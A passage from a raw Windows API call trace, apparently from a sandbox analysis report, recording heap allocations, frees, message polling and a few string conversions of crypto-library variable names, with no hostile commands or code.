Size=0x10) returned 0x2e50cc8 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0243.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0243.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0243.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0243.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0243.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0243.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0243.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0243.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14dee) returned 0x2e7f320 [0243.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0243.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0243.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0243.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0243.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0243.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0243.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0243.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0243.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0243.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0243.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0243.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0243.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0243.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0243.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0243.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0243.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.963] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0243.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0243.964] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0243.964] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0243.964] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0243.964] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.964] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0243.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.965] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0243.965] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.965] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0243.965] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0243.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0243.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0243.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0243.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.966] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0243.966] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0243.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0243.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0243.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0243.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0243.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0243.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0243.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0243.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0243.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0243.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 